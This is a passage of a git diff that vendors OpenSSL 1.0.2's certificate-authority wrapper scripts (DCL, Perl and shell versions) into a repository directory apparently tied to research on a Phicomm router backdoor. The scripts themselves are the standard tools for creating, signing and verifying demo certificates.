+$ REQ    = openssl + " req " + SSLEAY_CONFIG
+$ CA     = openssl + " ca " + SSLEAY_CONFIG
+$ VERIFY = openssl + " verify"
+$ X509   = openssl + " x509"
+$ PKCS12 = openssl + " pkcs12"
+$ echo   = "write sys$Output"
+$ RET = 1
+$!
+$! 2010-12-20 SMS.
+$! Use a concealed logical name to reduce command line lengths, to
+$! avoid DCL errors on VAX:
+$!     %DCL-W-TKNOVF, command element is too long - shorten
+$! (Path segments like "openssl-1_0_1-stable-SNAP-20101217" accumulate
+$! quickly.)
+$!
+$ CATOP = F$PARSE( F$ENVIRONMENT( "DEFAULT"), "[]")- "].;"+ ".demoCA.]"
+$ define /translation_attributes = concealed CATOP 'CATOP'
+$!
+$ on error then goto clean_up
+$ on control_y then goto clean_up
+$!
+$ CAKEY  = "CATOP:[private]cakey.pem"
+$ CACERT = "CATOP:[000000]cacert.pem"
+$
+$ __INPUT := SYS$COMMAND
+$!
+$ i = 1
+$opt_loop:
+$ if i .gt. 8 then goto opt_loop_end
+$
+$ prog_opt = F$EDIT(P'i',"lowercase")
+$
+$ IF (prog_opt .EQS. "?" .OR. prog_opt .EQS. "-h" .OR. prog_opt .EQS. "-help") 
+$ THEN
+$   echo "usage: CA -newcert|-newreq|-newca|-sign|-verify" 
+$   goto clean_up
+$ ENDIF
+$!
+$ IF (prog_opt .EQS. "-input")
+$ THEN
+$   ! Get input from somewhere other than SYS$COMMAND
+$   i = i + 1
+$   __INPUT = P'i'
+$   GOTO opt_loop_continue
+$ ENDIF
+$!
+$ IF (prog_opt .EQS. "-newcert")
+$ THEN
+$   ! Create a certificate.
+$   DEFINE /USER_MODE SYS$INPUT '__INPUT'
+$   REQ -new -x509 -keyout newreq.pem -out newreq.pem 'DAYS'
+$   RET=$STATUS
+$   echo "Certificate (and private key) is in newreq.pem"
+$   GOTO opt_loop_continue
+$ ENDIF
+$!
+$ IF (prog_opt .EQS. "-newreq")
+$ THEN
+$   ! Create a certificate request
+$   DEFINE /USER_MODE SYS$INPUT '__INPUT'
+$   REQ -new -keyout newreq.pem -out newreq.pem 'DAYS'
+$   RET=$STATUS
+$   echo "Request (and private key) is in newreq.pem"
+$   GOTO opt_loop_continue
+$ ENDIF
+$!
+$ IF (prog_opt .EQS. "-newca")
+$ THEN
+$   ! If explicitly asked for or it doesn't exist then setup the directory
+$   ! structure that Eric likes to manage things.
+$   IF F$SEARCH( "CATOP:[000000]serial.") .EQS. ""
+$   THEN
+$     CREATE /DIRECTORY /PROTECTION=OWNER:RWED CATOP:[000000]
+$     CREATE /DIRECTORY /PROTECTION=OWNER:RWED CATOP:[certs]
+$     CREATE /DIRECTORY /PROTECTION=OWNER:RWED CATOP:[crl]
+$     CREATE /DIRECTORY /PROTECTION=OWNER:RWED CATOP:[newcerts]
+$     CREATE /DIRECTORY /PROTECTION=OWNER:RWED CATOP:[private]
+$
+$     OPEN /WRITE ser_file CATOP:[000000]serial. 
+$     WRITE ser_file "01"
+$     CLOSE ser_file
+$     APPEND /NEW_VERSION NL: CATOP:[000000]index.txt
+$
+$     ! The following is to make sure access() doesn't get confused.  It
+$     ! really needs one file in the directory to give correct answers...
+$     COPY NLA0: CATOP:[certs].;
+$     COPY NLA0: CATOP:[crl].;
+$     COPY NLA0: CATOP:[newcerts].;
+$     COPY NLA0: CATOP:[private].;
+$   ENDIF
+$!
+$   IF F$SEARCH( CAKEY) .EQS. ""
+$   THEN
+$     READ '__INPUT' FILE -
+       /PROMPT="CA certificate filename (or enter to create): "
+$     IF (FILE .NES. "") .AND. (F$SEARCH(FILE) .NES. "")
+$     THEN
+$       COPY 'FILE' 'CAKEY'
+$       RET=$STATUS
+$     ELSE
+$       echo "Making CA certificate ..."
+$       DEFINE /USER_MODE SYS$INPUT '__INPUT'
+$       REQ -new -x509 -keyout 'CAKEY' -out 'CACERT' 'DAYS'
+$       RET=$STATUS
+$     ENDIF
+$   ENDIF
+$   GOTO opt_loop_continue
+$ ENDIF
+$!
+$ IF (prog_opt .EQS. "-pkcs12")
+$ THEN
+$   i = i + 1
+$   cname = P'i'
+$   IF cname .EQS. "" THEN cname = "My certificate"
+$   PKCS12 -in newcert.pem -inkey newreq.pem -certfile 'CACERT' -
+     -out newcert.p12 -export -name "''cname'"
+$   RET=$STATUS
+$   goto clean_up
+$ ENDIF
+$!
+$ IF (prog_opt .EQS. "-xsign")
+$ THEN
+$!
+$   DEFINE /USER_MODE SYS$INPUT '__INPUT'
+$   CA -policy policy_anything -infiles newreq.pem
+$   RET=$STATUS
+$   GOTO opt_loop_continue
+$ ENDIF
+$!
+$ IF ((prog_opt .EQS. "-sign") .OR. (prog_opt .EQS. "-signreq"))
+$ THEN
+$!   
+$   DEFINE /USER_MODE SYS$INPUT '__INPUT'
+$   CA -policy policy_anything -out newcert.pem -infiles newreq.pem
+$   RET=$STATUS
+$   type newcert.pem
+$   echo "Signed certificate is in newcert.pem"
+$   GOTO opt_loop_continue
+$ ENDIF
+$!
+$ IF (prog_opt .EQS. "-signcert")
+$  THEN
+$!   
+$   echo "Cert passphrase will be requested twice - bug?"
+$   DEFINE /USER_MODE SYS$INPUT '__INPUT'
+$   X509 -x509toreq -in newreq.pem -signkey newreq.pem -out tmp.pem
+$   DEFINE /USER_MODE SYS$INPUT '__INPUT'
+$   CA -policy policy_anything -out newcert.pem -infiles tmp.pem
+y
+y
+$   type newcert.pem
+$   echo "Signed certificate is in newcert.pem"
+$   GOTO opt_loop_continue
+$ ENDIF
+$!
+$ IF (prog_opt .EQS. "-verify")
+$ THEN
+$!   
+$   i = i + 1
+$   IF (p'i' .EQS. "")
+$   THEN
+$     DEFINE /USER_MODE SYS$INPUT '__INPUT'
+$     VERIFY "-CAfile" 'CACERT' newcert.pem
+$   ELSE
+$     j = i
+$    verify_opt_loop:
+$     IF j .GT. 8 THEN GOTO verify_opt_loop_end
+$     IF p'j' .NES. ""
+$     THEN 
+$       DEFINE /USER_MODE SYS$INPUT '__INPUT'
+$       __tmp = p'j'
+$       VERIFY "-CAfile" 'CACERT' '__tmp'
+$       tmp=$STATUS
+$       IF tmp .NE. 0 THEN RET=tmp
+$     ENDIF
+$     j = j + 1
+$     GOTO verify_opt_loop
+$    verify_opt_loop_end:
+$   ENDIF
+$   
+$   GOTO opt_loop_end
+$ ENDIF
+$!
+$ IF (prog_opt .NES. "")
+$ THEN
+$!   
+$   echo "Unknown argument ''prog_opt'"
+$   RET = 3
+$   goto clean_up
+$ ENDIF
+$
+$opt_loop_continue:
+$ i = i + 1
+$ GOTO opt_loop
+$
+$opt_loop_end:
+$!
+$clean_up:
+$!
+$ if f$trnlnm( "CATOP", "LNM$PROCESS") .nes. "" then -
+   deassign /process CATOP
+$!
+$ EXIT 'RET'
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl
new file mode 100644
index 0000000..a3965ec
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl
@@ -0,0 +1,189 @@
+#!/usr/bin/perl
+#
+# CA - wrapper around ca to make it easier to use ... basically ca requires
+#      some setup stuff to be done before you can use it and this makes
+#      things easier between now and when Eric is convinced to fix it :-)
+#
+# CA -newca ... will setup the right stuff
+# CA -newreq[-nodes] ... will generate a certificate request 
+# CA -sign ... will sign the generated request and output 
+#
+# At the end of that grab newreq.pem and newcert.pem (one has the key 
+# and the other the certificate) and cat them together and that is what
+# you want/need ... I'll make even this a little cleaner later.
+#
+#
+# 12-Jan-96 tjh    Added more things ... including CA -signcert which
+#                  converts a certificate to a request and then signs it.
+# 10-Jan-96 eay    Fixed a few more bugs and added the SSLEAY_CONFIG
+#		   environment variable so this can be driven from
+#		   a script.
+# 25-Jul-96 eay    Cleaned up filenames some more.
+# 11-Jun-96 eay    Fixed a few filename missmatches.
+# 03-May-96 eay    Modified to use 'ssleay cmd' instead of 'cmd'.
+# 18-Apr-96 tjh    Original hacking
+#
+# Tim Hudson
+# tjh@cryptsoft.com
+#
+
+# 27-Apr-98 snh    Translation into perl, fix existing CA bug.
+#
+#
+# Steve Henson
+# shenson@bigfoot.com
+
+# default openssl.cnf file has setup as per the following
+# demoCA ... where everything is stored
+
+my $openssl;
+if(defined $ENV{OPENSSL}) {
+	$openssl = $ENV{OPENSSL};
+} else {
+	$openssl = "openssl";
+	$ENV{OPENSSL} = $openssl;
+}
+
+$SSLEAY_CONFIG=$ENV{"SSLEAY_CONFIG"};
+$DAYS="-days 365";	# 1 year
+$CADAYS="-days 1095";	# 3 years
+$REQ="$openssl req $SSLEAY_CONFIG";
+$CA="$openssl ca $SSLEAY_CONFIG";
+$VERIFY="$openssl verify";
+$X509="$openssl x509";
+$PKCS12="$openssl pkcs12";
+
+$CATOP="./demoCA";
+$CAKEY="cakey.pem";
+$CAREQ="careq.pem";
+$CACERT="cacert.pem";
+
+$DIRMODE = 0777;
+
+$RET = 0;
+
+foreach (@ARGV) {
+	if ( /^(-\?|-h|-help)$/ ) {
+	    print STDERR "usage: CA -newcert|-newreq|-newreq-nodes|-newca|-sign|-verify\n";
+	    exit 0;
+	} elsif (/^-newcert$/) {
+	    # create a certificate
+	    system ("$REQ -new -x509 -keyout newkey.pem -out newcert.pem $DAYS");
+	    $RET=$?;
+	    print "Certificate is in newcert.pem, private key is in newkey.pem\n"
+	} elsif (/^-newreq$/) {
+	    # create a certificate request
+	    system ("$REQ -new -keyout newkey.pem -out newreq.pem $DAYS");
+	    $RET=$?;
+	    print "Request is in newreq.pem, private key is in newkey.pem\n";
+	} elsif (/^-newreq-nodes$/) {
+	    # create a certificate request
+	    system ("$REQ -new -nodes -keyout newkey.pem -out newreq.pem $DAYS");
+	    $RET=$?;
+	    print "Request is in newreq.pem, private key is in newkey.pem\n";
+	} elsif (/^-newca$/) {
+		# if explicitly asked for or it doesn't exist then setup the
+		# directory structure that Eric likes to manage things 
+	    $NEW="1";
+	    if ( "$NEW" || ! -f "${CATOP}/serial" ) {
+		# create the directory hierarchy
+		mkdir $CATOP, $DIRMODE;
+		mkdir "${CATOP}/certs", $DIRMODE;
+		mkdir "${CATOP}/crl", $DIRMODE ;
+		mkdir "${CATOP}/newcerts", $DIRMODE;
+		mkdir "${CATOP}/private", $DIRMODE;
+		open OUT, ">${CATOP}/index.txt";
+		close OUT;
+		open OUT, ">${CATOP}/crlnumber";
+		print OUT "01\n";
+		close OUT;
+	    }
+	    if ( ! -f "${CATOP}/private/$CAKEY" ) {
+		print "CA certificate filename (or enter to create)\n";
+		$FILE = <STDIN>;
+
+		chop $FILE;
+
+		# ask user for existing CA certificate
+		if ($FILE) {
+		    cp_pem($FILE,"${CATOP}/private/$CAKEY", "PRIVATE");
+		    cp_pem($FILE,"${CATOP}/$CACERT", "CERTIFICATE");
+		    $RET=$?;
+		} else {
+		    print "Making CA certificate ...\n";
+		    system ("$REQ -new -keyout " .
+			"${CATOP}/private/$CAKEY -out ${CATOP}/$CAREQ");
+		    system ("$CA -create_serial " .
+			"-out ${CATOP}/$CACERT $CADAYS -batch " . 
+			"-keyfile ${CATOP}/private/$CAKEY -selfsign " .
+			"-extensions v3_ca " .
+			"-infiles ${CATOP}/$CAREQ ");
+		    $RET=$?;
+		}
+	    }
+	} elsif (/^-pkcs12$/) {
+	    my $cname = $ARGV[1];
+	    $cname = "My Certificate" unless defined $cname;
+	    system ("$PKCS12 -in newcert.pem -inkey newkey.pem " .
+			"-certfile ${CATOP}/$CACERT -out newcert.p12 " .
+			"-export -name \"$cname\"");
+	    $RET=$?;
+	    print "PKCS #12 file is in newcert.p12\n";
+	    exit $RET;
+	} elsif (/^-xsign$/) {
+	    system ("$CA -policy policy_anything -infiles newreq.pem");
+	    $RET=$?;
+	} elsif (/^(-sign|-signreq)$/) {
+	    system ("$CA -policy policy_anything -out newcert.pem " .
+							"-infiles newreq.pem");
+	    $RET=$?;
+	    print "Signed certificate is in newcert.pem\n";
+	} elsif (/^(-signCA)$/) {
+	    system ("$CA -policy policy_anything -out newcert.pem " .
+					"-extensions v3_ca -infiles newreq.pem");
+	    $RET=$?;
+	    print "Signed CA certificate is in newcert.pem\n";
+	} elsif (/^-signcert$/) {
+	    system ("$X509 -x509toreq -in newreq.pem -signkey newreq.pem " .
+								"-out tmp.pem");
+	    system ("$CA -policy policy_anything -out newcert.pem " .
+							"-infiles tmp.pem");
+	    $RET = $?;
+	    print "Signed certificate is in newcert.pem\n";
+	} elsif (/^-verify$/) {
+	    if (shift) {
+		foreach $j (@ARGV) {
+		    system ("$VERIFY -CAfile $CATOP/$CACERT $j");
+		    $RET=$? if ($? != 0);
+		}
+		exit $RET;
+	    } else {
+		    system ("$VERIFY -CAfile $CATOP/$CACERT newcert.pem");
+		    $RET=$?;
+	    	    exit 0;
+	    }
+	} else {
+	    print STDERR "Unknown arg $_\n";
+	    print STDERR "usage: CA -newcert|-newreq|-newreq-nodes|-newca|-sign|-verify\n";
+	    exit 1;
+	}
+}
+
+exit $RET;
+
+sub cp_pem {
+my ($infile, $outfile, $bound) = @_;
+open IN, $infile;
+open OUT, ">$outfile";
+my $flag = 0;
+while (<IN>) {
+	$flag = 1 if (/^-----BEGIN.*$bound/) ;
+	print OUT $_ if ($flag);
+	if (/^-----END.*$bound/) {
+		close IN;
+		close OUT;
+		return;
+	}
+}
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl.bak
new file mode 100644
index 0000000..a3965ec
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl.bak
@@ -0,0 +1,189 @@
+#!/usr/bin/perl
+#
+# CA - wrapper around ca to make it easier to use ... basically ca requires
+#      some setup stuff to be done before you can use it and this makes
+#      things easier between now and when Eric is convinced to fix it :-)
+#
+# CA -newca ... will setup the right stuff
+# CA -newreq[-nodes] ... will generate a certificate request 
+# CA -sign ... will sign the generated request and output 
+#
+# At the end of that grab newreq.pem and newcert.pem (one has the key 
+# and the other the certificate) and cat them together and that is what
+# you want/need ... I'll make even this a little cleaner later.
+#
+#
+# 12-Jan-96 tjh    Added more things ... including CA -signcert which
+#                  converts a certificate to a request and then signs it.
+# 10-Jan-96 eay    Fixed a few more bugs and added the SSLEAY_CONFIG
+#		   environment variable so this can be driven from
+#		   a script.
+# 25-Jul-96 eay    Cleaned up filenames some more.
+# 11-Jun-96 eay    Fixed a few filename missmatches.
+# 03-May-96 eay    Modified to use 'ssleay cmd' instead of 'cmd'.
+# 18-Apr-96 tjh    Original hacking
+#
+# Tim Hudson
+# tjh@cryptsoft.com
+#
+
+# 27-Apr-98 snh    Translation into perl, fix existing CA bug.
+#
+#
+# Steve Henson
+# shenson@bigfoot.com
+
+# default openssl.cnf file has setup as per the following
+# demoCA ... where everything is stored
+
+my $openssl;
+if(defined $ENV{OPENSSL}) {
+	$openssl = $ENV{OPENSSL};
+} else {
+	$openssl = "openssl";
+	$ENV{OPENSSL} = $openssl;
+}
+
+$SSLEAY_CONFIG=$ENV{"SSLEAY_CONFIG"};
+$DAYS="-days 365";	# 1 year
+$CADAYS="-days 1095";	# 3 years
+$REQ="$openssl req $SSLEAY_CONFIG";
+$CA="$openssl ca $SSLEAY_CONFIG";
+$VERIFY="$openssl verify";
+$X509="$openssl x509";
+$PKCS12="$openssl pkcs12";
+
+$CATOP="./demoCA";
+$CAKEY="cakey.pem";
+$CAREQ="careq.pem";
+$CACERT="cacert.pem";
+
+$DIRMODE = 0777;
+
+$RET = 0;
+
+foreach (@ARGV) {
+	if ( /^(-\?|-h|-help)$/ ) {
+	    print STDERR "usage: CA -newcert|-newreq|-newreq-nodes|-newca|-sign|-verify\n";
+	    exit 0;
+	} elsif (/^-newcert$/) {
+	    # create a certificate
+	    system ("$REQ -new -x509 -keyout newkey.pem -out newcert.pem $DAYS");
+	    $RET=$?;
+	    print "Certificate is in newcert.pem, private key is in newkey.pem\n"
+	} elsif (/^-newreq$/) {
+	    # create a certificate request
+	    system ("$REQ -new -keyout newkey.pem -out newreq.pem $DAYS");
+	    $RET=$?;
+	    print "Request is in newreq.pem, private key is in newkey.pem\n";
+	} elsif (/^-newreq-nodes$/) {
+	    # create a certificate request
+	    system ("$REQ -new -nodes -keyout newkey.pem -out newreq.pem $DAYS");
+	    $RET=$?;
+	    print "Request is in newreq.pem, private key is in newkey.pem\n";
+	} elsif (/^-newca$/) {
+		# if explicitly asked for or it doesn't exist then setup the
+		# directory structure that Eric likes to manage things 
+	    $NEW="1";
+	    if ( "$NEW" || ! -f "${CATOP}/serial" ) {
+		# create the directory hierarchy
+		mkdir $CATOP, $DIRMODE;
+		mkdir "${CATOP}/certs", $DIRMODE;
+		mkdir "${CATOP}/crl", $DIRMODE ;
+		mkdir "${CATOP}/newcerts", $DIRMODE;
+		mkdir "${CATOP}/private", $DIRMODE;
+		open OUT, ">${CATOP}/index.txt";
+		close OUT;
+		open OUT, ">${CATOP}/crlnumber";
+		print OUT "01\n";
+		close OUT;
+	    }
+	    if ( ! -f "${CATOP}/private/$CAKEY" ) {
+		print "CA certificate filename (or enter to create)\n";
+		$FILE = <STDIN>;
+
+		chop $FILE;
+
+		# ask user for existing CA certificate
+		if ($FILE) {
+		    cp_pem($FILE,"${CATOP}/private/$CAKEY", "PRIVATE");
+		    cp_pem($FILE,"${CATOP}/$CACERT", "CERTIFICATE");
+		    $RET=$?;
+		} else {
+		    print "Making CA certificate ...\n";
+		    system ("$REQ -new -keyout " .
+			"${CATOP}/private/$CAKEY -out ${CATOP}/$CAREQ");
+		    system ("$CA -create_serial " .
+			"-out ${CATOP}/$CACERT $CADAYS -batch " . 
+			"-keyfile ${CATOP}/private/$CAKEY -selfsign " .
+			"-extensions v3_ca " .
+			"-infiles ${CATOP}/$CAREQ ");
+		    $RET=$?;
+		}
+	    }
+	} elsif (/^-pkcs12$/) {
+	    my $cname = $ARGV[1];
+	    $cname = "My Certificate" unless defined $cname;
+	    system ("$PKCS12 -in newcert.pem -inkey newkey.pem " .
+			"-certfile ${CATOP}/$CACERT -out newcert.p12 " .
+			"-export -name \"$cname\"");
+	    $RET=$?;
+	    print "PKCS #12 file is in newcert.p12\n";
+	    exit $RET;
+	} elsif (/^-xsign$/) {
+	    system ("$CA -policy policy_anything -infiles newreq.pem");
+	    $RET=$?;
+	} elsif (/^(-sign|-signreq)$/) {
+	    system ("$CA -policy policy_anything -out newcert.pem " .
+							"-infiles newreq.pem");
+	    $RET=$?;
+	    print "Signed certificate is in newcert.pem\n";
+	} elsif (/^(-signCA)$/) {
+	    system ("$CA -policy policy_anything -out newcert.pem " .
+					"-extensions v3_ca -infiles newreq.pem");
+	    $RET=$?;
+	    print "Signed CA certificate is in newcert.pem\n";
+	} elsif (/^-signcert$/) {
+	    system ("$X509 -x509toreq -in newreq.pem -signkey newreq.pem " .
+								"-out tmp.pem");
+	    system ("$CA -policy policy_anything -out newcert.pem " .
+							"-infiles tmp.pem");
+	    $RET = $?;
+	    print "Signed certificate is in newcert.pem\n";
+	} elsif (/^-verify$/) {
+	    if (shift) {
+		foreach $j (@ARGV) {
+		    system ("$VERIFY -CAfile $CATOP/$CACERT $j");
+		    $RET=$? if ($? != 0);
+		}
+		exit $RET;
+	    } else {
+		    system ("$VERIFY -CAfile $CATOP/$CACERT newcert.pem");
+		    $RET=$?;
+	    	    exit 0;
+	    }
+	} else {
+	    print STDERR "Unknown arg $_\n";
+	    print STDERR "usage: CA -newcert|-newreq|-newreq-nodes|-newca|-sign|-verify\n";
+	    exit 1;
+	}
+}
+
+exit $RET;
+
+sub cp_pem {
+my ($infile, $outfile, $bound) = @_;
+open IN, $infile;
+open OUT, ">$outfile";
+my $flag = 0;
+while (<IN>) {
+	$flag = 1 if (/^-----BEGIN.*$bound/) ;
+	print OUT $_ if ($flag);
+	if (/^-----END.*$bound/) {
+		close IN;
+		close OUT;
+		return;
+	}
+}
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl.in b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl.in
new file mode 100644
index 0000000..c783a6e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl.in
@@ -0,0 +1,189 @@
+#!/usr/local/bin/perl
+#
+# CA - wrapper around ca to make it easier to use ... basically ca requires
+#      some setup stuff to be done before you can use it and this makes
+#      things easier between now and when Eric is convinced to fix it :-)
+#
+# CA -newca ... will setup the right stuff
+# CA -newreq[-nodes] ... will generate a certificate request 
+# CA -sign ... will sign the generated request and output 
+#
+# At the end of that grab newreq.pem and newcert.pem (one has the key 
+# and the other the certificate) and cat them together and that is what
+# you want/need ... I'll make even this a little cleaner later.
+#
+#
+# 12-Jan-96 tjh    Added more things ... including CA -signcert which
+#                  converts a certificate to a request and then signs it.
+# 10-Jan-96 eay    Fixed a few more bugs and added the SSLEAY_CONFIG
+#		   environment variable so this can be driven from
+#		   a script.
+# 25-Jul-96 eay    Cleaned up filenames some more.
+# 11-Jun-96 eay    Fixed a few filename missmatches.
+# 03-May-96 eay    Modified to use 'ssleay cmd' instead of 'cmd'.
+# 18-Apr-96 tjh    Original hacking
+#
+# Tim Hudson
+# tjh@cryptsoft.com
+#
+
+# 27-Apr-98 snh    Translation into perl, fix existing CA bug.
+#
+#
+# Steve Henson
+# shenson@bigfoot.com
+
+# default openssl.cnf file has setup as per the following
+# demoCA ... where everything is stored
+
+my $openssl;
+if(defined $ENV{OPENSSL}) {
+	$openssl = $ENV{OPENSSL};
+} else {
+	$openssl = "openssl";
+	$ENV{OPENSSL} = $openssl;
+}
+
+$SSLEAY_CONFIG=$ENV{"SSLEAY_CONFIG"};
+$DAYS="-days 365";	# 1 year
+$CADAYS="-days 1095";	# 3 years
+$REQ="$openssl req $SSLEAY_CONFIG";
+$CA="$openssl ca $SSLEAY_CONFIG";
+$VERIFY="$openssl verify";
+$X509="$openssl x509";
+$PKCS12="$openssl pkcs12";
+
+$CATOP="./demoCA";
+$CAKEY="cakey.pem";
+$CAREQ="careq.pem";
+$CACERT="cacert.pem";
+
+$DIRMODE = 0777;
+
+$RET = 0;
+
+foreach (@ARGV) {
+	if ( /^(-\?|-h|-help)$/ ) {
+	    print STDERR "usage: CA -newcert|-newreq|-newreq-nodes|-newca|-sign|-verify\n";
+	    exit 0;
+	} elsif (/^-newcert$/) {
+	    # create a certificate
+	    system ("$REQ -new -x509 -keyout newkey.pem -out newcert.pem $DAYS");
+	    $RET=$?;
+	    print "Certificate is in newcert.pem, private key is in newkey.pem\n"
+	} elsif (/^-newreq$/) {
+	    # create a certificate request
+	    system ("$REQ -new -keyout newkey.pem -out newreq.pem $DAYS");
+	    $RET=$?;
+	    print "Request is in newreq.pem, private key is in newkey.pem\n";
+	} elsif (/^-newreq-nodes$/) {
+	    # create a certificate request
+	    system ("$REQ -new -nodes -keyout newkey.pem -out newreq.pem $DAYS");
+	    $RET=$?;
+	    print "Request is in newreq.pem, private key is in newkey.pem\n";
+	} elsif (/^-newca$/) {
+		# if explicitly asked for or it doesn't exist then setup the
+		# directory structure that Eric likes to manage things 
+	    $NEW="1";
+	    if ( "$NEW" || ! -f "${CATOP}/serial" ) {
+		# create the directory hierarchy
+		mkdir $CATOP, $DIRMODE;
+		mkdir "${CATOP}/certs", $DIRMODE;
+		mkdir "${CATOP}/crl", $DIRMODE ;
+		mkdir "${CATOP}/newcerts", $DIRMODE;
+		mkdir "${CATOP}/private", $DIRMODE;
+		open OUT, ">${CATOP}/index.txt";
+		close OUT;
+		open OUT, ">${CATOP}/crlnumber";
+		print OUT "01\n";
+		close OUT;
+	    }
+	    if ( ! -f "${CATOP}/private/$CAKEY" ) {
+		print "CA certificate filename (or enter to create)\n";
+		$FILE = <STDIN>;
+
+		chop $FILE;
+
+		# ask user for existing CA certificate
+		if ($FILE) {
+		    cp_pem($FILE,"${CATOP}/private/$CAKEY", "PRIVATE");
+		    cp_pem($FILE,"${CATOP}/$CACERT", "CERTIFICATE");
+		    $RET=$?;
+		} else {
+		    print "Making CA certificate ...\n";
+		    system ("$REQ -new -keyout " .
+			"${CATOP}/private/$CAKEY -out ${CATOP}/$CAREQ");
+		    system ("$CA -create_serial " .
+			"-out ${CATOP}/$CACERT $CADAYS -batch " . 
+			"-keyfile ${CATOP}/private/$CAKEY -selfsign " .
+			"-extensions v3_ca " .
+			"-infiles ${CATOP}/$CAREQ ");
+		    $RET=$?;
+		}
+	    }
+	} elsif (/^-pkcs12$/) {
+	    my $cname = $ARGV[1];
+	    $cname = "My Certificate" unless defined $cname;
+	    system ("$PKCS12 -in newcert.pem -inkey newkey.pem " .
+			"-certfile ${CATOP}/$CACERT -out newcert.p12 " .
+			"-export -name \"$cname\"");
+	    $RET=$?;
+	    print "PKCS #12 file is in newcert.p12\n";
+	    exit $RET;
+	} elsif (/^-xsign$/) {
+	    system ("$CA -policy policy_anything -infiles newreq.pem");
+	    $RET=$?;
+	} elsif (/^(-sign|-signreq)$/) {
+	    system ("$CA -policy policy_anything -out newcert.pem " .
+							"-infiles newreq.pem");
+	    $RET=$?;
+	    print "Signed certificate is in newcert.pem\n";
+	} elsif (/^(-signCA)$/) {
+	    system ("$CA -policy policy_anything -out newcert.pem " .
+					"-extensions v3_ca -infiles newreq.pem");
+	    $RET=$?;
+	    print "Signed CA certificate is in newcert.pem\n";
+	} elsif (/^-signcert$/) {
+	    system ("$X509 -x509toreq -in newreq.pem -signkey newreq.pem " .
+								"-out tmp.pem");
+	    system ("$CA -policy policy_anything -out newcert.pem " .
+							"-infiles tmp.pem");
+	    $RET = $?;
+	    print "Signed certificate is in newcert.pem\n";
+	} elsif (/^-verify$/) {
+	    if (shift) {
+		foreach $j (@ARGV) {
+		    system ("$VERIFY -CAfile $CATOP/$CACERT $j");
+		    $RET=$? if ($? != 0);
+		}
+		exit $RET;
+	    } else {
+		    system ("$VERIFY -CAfile $CATOP/$CACERT newcert.pem");
+		    $RET=$?;
+	    	    exit 0;
+	    }
+	} else {
+	    print STDERR "Unknown arg $_\n";
+	    print STDERR "usage: CA -newcert|-newreq|-newreq-nodes|-newca|-sign|-verify\n";
+	    exit 1;
+	}
+}
+
+exit $RET;
+
+sub cp_pem {
+my ($infile, $outfile, $bound) = @_;
+open IN, $infile;
+open OUT, ">$outfile";
+my $flag = 0;
+while (<IN>) {
+	$flag = 1 if (/^-----BEGIN.*$bound/) ;
+	print OUT $_ if ($flag);
+	if (/^-----END.*$bound/) {
+		close IN;
+		close OUT;
+		return;
+	}
+}
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.sh
new file mode 100644
index 0000000..7ad6b8c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.sh
@@ -0,0 +1,198 @@
+#!/bin/sh
+#
+# CA - wrapper around ca to make it easier to use ... basically ca requires
+#      some setup stuff to be done before you can use it and this makes
+#      things easier between now and when Eric is convinced to fix it :-)
+#
+# CA -newca ... will setup the right stuff
+# CA -newreq ... will generate a certificate request
+# CA -sign ... will sign the generated request and output
+#
+# At the end of that grab newreq.pem and newcert.pem (one has the key
+# and the other the certificate) and cat them together and that is what
+# you want/need ... I'll make even this a little cleaner later.
+#
+#
+# 12-Jan-96 tjh    Added more things ... including CA -signcert which
+#                  converts a certificate to a request and then signs it.
+# 10-Jan-96 eay    Fixed a few more bugs and added the SSLEAY_CONFIG
+#                  environment variable so this can be driven from
+#                  a script.
+# 25-Jul-96 eay    Cleaned up filenames some more.
+# 11-Jun-96 eay    Fixed a few filename missmatches.
+# 03-May-96 eay    Modified to use 'ssleay cmd' instead of 'cmd'.
+# 18-Apr-96 tjh    Original hacking
+#
+# Tim Hudson
+# tjh@cryptsoft.com
+#
+
+# default openssl.cnf file has setup as per the following
+# demoCA ... where everything is stored
+cp_pem() {
+    infile=$1
+    outfile=$2
+    bound=$3
+    flag=0
+    exec <$infile;
+    while read line; do
+	if [ $flag -eq 1 ]; then
+		echo $line|grep "^-----END.*$bound"  2>/dev/null 1>/dev/null
+		if [ $? -eq 0 ] ; then
+			echo $line >>$outfile
+			break
+		else
+			echo $line >>$outfile
+		fi
+	fi
+
+	echo $line|grep "^-----BEGIN.*$bound"  2>/dev/null 1>/dev/null
+	if [ $? -eq 0 ]; then
+		echo $line >$outfile
+		flag=1
+	fi
+    done
+}
+
+usage() {
+ echo "usage: $0 -newcert|-newreq|-newreq-nodes|-newca|-sign|-verify" >&2
+}
+
+if [ -z "$OPENSSL" ]; then OPENSSL=openssl; fi
+
+if [ -z "$DAYS" ] ; then DAYS="-days 365" ; fi	# 1 year
+CADAYS="-days 1095"	# 3 years
+REQ="$OPENSSL req $SSLEAY_CONFIG"
+CA="$OPENSSL ca $SSLEAY_CONFIG"
+VERIFY="$OPENSSL verify"
+X509="$OPENSSL x509"
+PKCS12="openssl pkcs12"
+
+if [ -z "$CATOP" ] ; then CATOP=./demoCA ; fi
+CAKEY=./cakey.pem
+CAREQ=./careq.pem
+CACERT=./cacert.pem
+
+RET=0
+
+while [ "$1" != "" ] ; do
+case $1 in
+-\?|-h|-help)
+    usage
+    exit 0
+    ;;
+-newcert)
+    # create a certificate
+    $REQ -new -x509 -keyout newkey.pem -out newcert.pem $DAYS
+    RET=$?
+    echo "Certificate is in newcert.pem, private key is in newkey.pem"
+    ;;
+-newreq)
+    # create a certificate request
